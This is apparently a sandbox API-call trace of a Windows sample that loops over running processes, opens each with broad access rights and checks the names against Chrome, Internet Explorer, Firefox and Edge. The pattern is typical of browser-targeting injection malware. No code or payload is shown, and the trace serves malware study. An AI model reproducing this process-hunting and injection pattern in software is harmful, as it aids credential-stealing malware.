	[0206.885] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.885] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x30f0
	[0206.885] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.886] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.886] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.886] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.886] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.887] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.887] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.887] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0206.888] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x30f4
	[0206.888] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.888] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0206.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.889] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0206.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.889] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0206.889] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0206.889] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0206.890] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0206.890] CloseHandle (hObject=0x188) returned 1
	[0206.890] Sleep (dwMilliseconds=0x64) 
	[0206.998] GetCurrentProcessId () returned 0x110
	[0206.998] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0207.001] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0207.002] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0207.003] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0207.004] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x30f8
	[0207.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.004] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0207.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.005] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.005] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0207.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.005] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.006] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0207.006] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x30fc
	[0207.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.007] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0207.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.007] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.007] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0207.008] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.008] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.008] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0207.009] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x3100
	[0207.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.009] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0207.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.009] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.010] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0207.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.010] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.010] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0207.012] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x3104
	[0207.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.012] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0207.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.012] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.013] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0207.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.013] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.013] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0207.014] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x3108
	[0207.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.014] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0207.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.014] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.015] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0207.015] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.015] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.016] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0207.017] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x310c
	[0207.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.017] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0207.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.017] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.018] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0207.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.018] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.018] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0207.019] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3110
	[0207.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.019] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0207.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.019] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.019] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0207.020] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.020] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.020] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0207.021] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3114
	[0207.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.021] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0207.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.021] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.021] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0207.021] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.021] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.022] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0207.022] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x3118
	[0207.022] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.022] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0207.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.023] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.023] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0207.023] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.023] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.024] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0207.024] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x311c
	[0207.024] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.024] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0207.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.025] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.025] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0207.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.025] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.025] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0207.026] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3120
	[0207.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.026] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0207.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.027] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.027] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0207.027] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.027] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.027] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0207.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x3124
	[0207.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.029] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0207.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.029] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.029] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0207.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.030] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.030] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0207.030] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x3128
	[0207.030] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.031] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0207.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.031] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.031] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0207.031] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.032] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.032] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0207.032] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x312c
	[0207.032] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.033] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0207.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.033] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.033] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0207.033] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.033] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.034] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0207.034] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x3130
	[0207.034] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.034] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0207.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.035] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.035] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0207.035] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.035] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.036] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0207.036] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3134
	[0207.036] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.036] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0207.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.037] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.037] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0207.037] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.037] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.038] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0207.038] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x3138
	[0207.038] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.038] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0207.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.039] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.039] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0207.039] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.039] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.039] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0207.040] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x313c
	[0207.040] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.040] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0207.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.041] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.041] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0207.041] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.041] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.041] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0207.042] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x3140
	[0207.042] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.042] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0207.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.043] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.043] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0207.043] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.043] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.043] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0207.044] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x3144
	[0207.044] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.044] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0207.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.045] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.045] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0207.045] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.045] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.046] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0207.046] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x3148
	[0207.046] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.046] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0207.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.047] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.047] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.047] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0207.048] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.048] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0207.048] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0207.048] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x314c
	[0207.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.049] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0207.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0207.049] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0207.049] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
